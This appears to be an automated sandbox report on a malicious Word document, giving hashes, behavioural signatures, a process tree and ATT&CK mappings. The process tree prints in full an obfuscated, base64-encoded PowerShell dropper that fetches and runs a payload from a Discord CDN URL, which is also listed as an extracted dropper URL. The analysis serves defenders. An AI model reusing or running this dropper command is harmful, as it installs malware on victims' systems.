Resubmissions

14-10-2021 18:15

211014-wvyn9sahbr 10

14-10-2021 17:51

211014-wfggfaahaj 10

14-10-2021 17:48

211014-wdmwfaaag5 10

Analysis

  • max time kernel
    139s
  • max time network
    122s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    14-10-2021 17:48

General

  • Target

    BIlls-8172135.doc

  • Size

    43KB

  • MD5

    12489be76fc04c1226707d1029f834a8

  • SHA1

    6aedf03afe4e5b7cb220d8541473243a9bd17179

  • SHA256

    ccff267f5824ca8d8480b9050ff631681b3d7a0817241374cfa65fc7a3b58476

  • SHA512

    1a7d7ddbc7f6da7e448ce83af6a3802c8e57bf1da8fe51e494e52c143ebda3759b0fbe044e1ecc394b02e3c7cba803ae2156dc781bb4242402bb8e58e55ee79b

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cdn.discordapp.com/attachments/851105085270523917/895674622702399538/Server.txt

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\BIlls-8172135.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1688
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Documents\mosad.bat" "
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3256
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        poweRSheLL.eXe -executIonPOLIcY ByPaSs -nOProfILe -WIndoWSTYLe HiDdeN -E JABTAFoAWABEAEMARgBWAEcAQgBIAE4ASgBTAEQARgBHAEgAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwA4ADUAMQAxADAANQAwADgANQAyADcAMAA1ADIAMwA5ADEANwAvADgAOQA1ADYANwA0ADYAMgAyADcAMAAyADMAOQA5ADUAMwA4AC8AUwBlAHIAdgBlAHIALgB0AHgAdAAnADsADQAKACQARQBEAFIARgBHAEgATgBKAE0ASwBEAEUARgBHAEgASgAgAD0AIAAnAG4ARQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAEUAYgBDACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAVAAnAC4AUgBlAHAAbABhAGMAZQAoACcALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAnACwAJwB0AC4AVwAnACkALgBSAGUAcABsAGEAYwBlACgAJwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACcALAAnAGwASQBFAE4AJwApADsADQAKACQAUwBYAEQAQwBGAFYARwBCAEgATgBKAFgARABDAEYAVgBHAEIASABKAEsAIAA9ACAAJwBEAE8AKgAqACoAKgAqACoAKgAqACoAKgAqACoAKgBhAEQAUwBUADwAPAA8ADwAPAA8ADwAPAA8AD4APgA+AD4APgA+AD4APgA+AD4APgBHACcALgBSAGUAcABsAGEAYwBlACgAJwAqACoAKgAqACoAKgAqACoAKgAqACoAKgAqACcALAAnAFcAbgBMAG8AJwApAC4AUgBlAHAAbABhAGMAZQAoACcAPAA8ADwAPAA8ADwAPAA8ADwAPgA+AD4APgA+AD4APgA+AD4APgA+ACcALAAnAHIASQBuACcAKQA7AA0ACgAkAFMAVwBYAEQARQBDAFIARgBHAFkASABVAEoASQBTAEQARgBWAEcASABKACAAPQAnAEkAYABFAFgAKABuAGAALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQBgAGMAYABUACAAJABFAEQAUgBGAEcASABOAEoATQBLAEQAPAA8ADwAPAA8ADwAPAA8ADwAPAA8ADwAPAA8AD4APgA+AD4APgA+AD4APgA+AD4APgA+AD4APgBHAEIASABOAEoAUwBEAEYARwBIACkAJwAuAFIAZQBwAGwAYQBjAGUAKAAnAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0AJwAsACcAZQBgAFcAYAAtAE8AYgBqAGAARQAnACkALgBSAGUAcABsAGEAYwBlACgAJwA8ADwAPAA8ADwAPAA8ADwAPAA8ADwAPAA8ADwAPgA+AD4APgA+AD4APgA+AD4APgA+AD4APgA+ACcALAAnAEUARgBHAEgASgApAC4AJABTAFgARABDAEYAVgBHAEIASABOAEoAWABEAEMARgBWAEcAQgBIAEoASwAoACQAUwBaAFgARABDAEYAVgAnACkAOwANAAoAJgAoACcASQAnACsAJwBFAFgAJwApACgAJABTAFcAWABEAEUAQwBSAEYARwBZAEgAVQBKAEkAUwBEAEYAVgBHAEgASgAgAC0ASgBvAGkAbgAgACcAJwApAHwAJgAoACcASQAnACsAJwBFAFgAJwApADsA"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3764
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:1920
    • C:\Windows\System32\NOTEPAD.EXE
      "C:\Windows\System32\NOTEPAD.EXE" C:\Users\Public\Documents\mosad.bat
      1⤵
      • Opens file in notepad (likely ransom note)
      PID:3808

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    2
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Public\Documents\mosad.bat
      MD5

      a685d75068195fb660a916c72d1ffbcc

      SHA1

      7444ec315ba2439a0388415074667739323541c6

      SHA256

      cc5a024786036aa094718ecc292f781bceed4cd6636885f4eec0ba285bd24570

      SHA512

      ba66ecea4e5179be1b8670d3e14cf6cfafe6b98b7b0527c79398c3adc026bb82e38284392f712499cbf2cd6afe4325844a244662f129df3767a2cb7c88b62397

    • memory/1688-118-0x00007FFEE1440000-0x00007FFEE1450000-memory.dmp
      Filesize

      64KB

    • memory/1688-116-0x00007FFEE1440000-0x00007FFEE1450000-memory.dmp
      Filesize

      64KB

    • memory/1688-115-0x00007FFEE1440000-0x00007FFEE1450000-memory.dmp
      Filesize

      64KB

    • memory/1688-119-0x000002B10D190000-0x000002B10D192000-memory.dmp
      Filesize

      8KB

    • memory/1688-120-0x000002B10D190000-0x000002B10D192000-memory.dmp
      Filesize

      8KB

    • memory/1688-121-0x00007FFEE1440000-0x00007FFEE1450000-memory.dmp
      Filesize

      64KB

    • memory/1688-122-0x000002B10D190000-0x000002B10D192000-memory.dmp
      Filesize

      8KB

    • memory/1688-117-0x00007FFEE1440000-0x00007FFEE1450000-memory.dmp
      Filesize

      64KB

    • memory/3256-258-0x0000000000000000-mapping.dmp
    • memory/3764-261-0x0000000000000000-mapping.dmp
    • memory/3764-285-0x000001B8515A0000-0x000001B8515A2000-memory.dmp
      Filesize

      8KB

    • memory/3764-286-0x000001B8515A3000-0x000001B8515A5000-memory.dmp
      Filesize

      8KB

    • memory/3764-287-0x000001B8515A6000-0x000001B8515A8000-memory.dmp
      Filesize

      8KB

    • memory/3764-309-0x000001B8515A8000-0x000001B8515A9000-memory.dmp
      Filesize

      4KB